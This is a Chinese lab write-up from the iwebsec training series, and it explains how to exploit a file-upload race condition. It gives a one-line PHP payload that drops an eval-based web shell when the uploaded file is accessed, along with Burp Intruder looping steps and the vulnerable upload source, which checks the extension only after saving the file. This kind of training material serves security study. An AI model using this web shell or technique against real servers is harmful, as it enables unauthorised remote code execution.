iwebsec-文件上传 07 条件竞争

合集 - iwebsec(34)

1.iwebsec-sql注入 01 数字型注入2023-08-182.iwebsec-sql注入 02 字符型注入2023-08-183.iwebsec-sql注入 03 bool型注入2023-08-184.iwebsec-sql注入 04 时间延迟型注入2023-08-185.iwebsec-sql注入 05 报错型注入2023-08-186.iwebsec-sql注入 06 宽字节字符型注入2023-08-187.iwebsec-sql注入 07 空格过滤2023-08-188.iwebsec-sql注入 08 大小写过滤注入2023-08-189.iwebsec-sql注入 09 双写关键字绕过2023-08-1810.iwebsec-sql注入 10 双重url编码绕过2023-08-1811.iwebsec-sql注入 11 十六进制编码绕过2023-08-1812.iwebsec-sql注入 12 等价函数替换过滤2023-08-1813.iwebsec-sql注入 13 二次注入2023-08-1914.iwebsec-文件上传 01 前端JS过滤绕过2023-08-1915.iwebsec-文件上传 02 文件名过滤绕过2023-08-1916.iwebsec-文件上传 03 Content-Type过滤绕过2023-08-1917.iwebsec-文件上传 04 文件头过滤绕过2023-08-1918.iwebsec-文件上传 05 .htaccess2023-08-1919.iwebsec-文件上传 06 文件截断上传2023-08-19

20.iwebsec-文件上传 07 条件竞争2023-08-19

21.iwebsec-文件包含 01 本地文件包含2023-08-2022.iwebsec-文件包含 02 本地文件包含绕过2023-08-2023.iwebsec-文件包含 03 session本地文件包含2023-08-2024.iwebsec-文件包含 04 文件头过滤绕过2023-08-2025.iwebsec-文件包含 05 远程文件包含绕过2023-08-2026.iwebsec-文件包含 06 php://filter伪协议2023-08-2027.iwebsec-文件包含 07 php://input伪协议2023-08-2028.iwebsec-文件包含 08 php://input伪协议利用2023-08-2029.iwebsec-文件包含 09 file://伪协议利用2023-08-2030.iwebsec-文件包含 10 data://伪协议利用2023-08-2031.iwebsec-xss 01 反射型xss2023-08-2132.iwebsec-xss 02 存储型xss2023-08-2133.iwebsec-xss 03 DOM型xss2023-08-2134.iwebsec-xss 04 xss修复示例2023-08-21

收起

01、题目分析

在文件上传的时候，会有一瞬间进行判断，如果上传文件违规会进行删除，我们要做的就是在删除文件之前先访问到上传的文件，就可以通过两个不断的发包实现这个功能，先发一个一直上传的包，再同时发一个一直访问的包，一直循环，找到一个文件在服务器的时候正好访问到的时机，不仅仅访问，同时创建出一个后门

02、文件上传

访问代码：访问即创建代码搞出来（访问了自动创建一个后门代码）

<?php fputs(fopen('xiao.php','w'),'<?php eval($_REQUEST[1]);?>');?>

然后先抓一个访问shell.php的包出来，发送到intruder中，payload选null payloads，然后选择一直循环

然后我们再弄一个一直上传的包，其他的配置都一样

然后一直去webshell访问路径，看看能否访问到

03、源码分析

<?php
if (isset($_POST['submit'])){ // 检查表单中是否存在名为 'submit' 的提交按钮
    $allow_ext = array("gif","png","jpg"); // 允许上传的文件扩展名列表
        
    $uploaddir = 'uploads/'; // 定义文件上传目录
 
    $filename = $uploaddir.$_FILES['upfile']['name']; // 上传文件的完整路径和文件名
        
    move_uploaded_file($_FILES['upfile']['tmp_name'],$filename); // 将上传的临时文件移动到指定的目录和文件名
  
    $file = "./".$filename; // 上传文件的相对路径和文件名
    echo "文件上传成功: ".$file."\n<br />"; // 输出上传成功的信息以及文件路径和文件名
 
    $ext = array_pop(explode(".",$_FILES['upfile']['name'])); // 获取上传文件的扩展名
    if (!in_array($ext,$allow_ext)){ // 检查上传文件的扩展名是否在允许的扩展名列表中
        unlink($file); // 如果文件类型不允许上传，则删除已上传的文件
        die("此文件类型不允许上传已删除"); // 终止脚本的执行，并输出错误提示
    }
}else{
    die(""); // 如果没有点击提交按钮，则终止脚本的执行
}
?>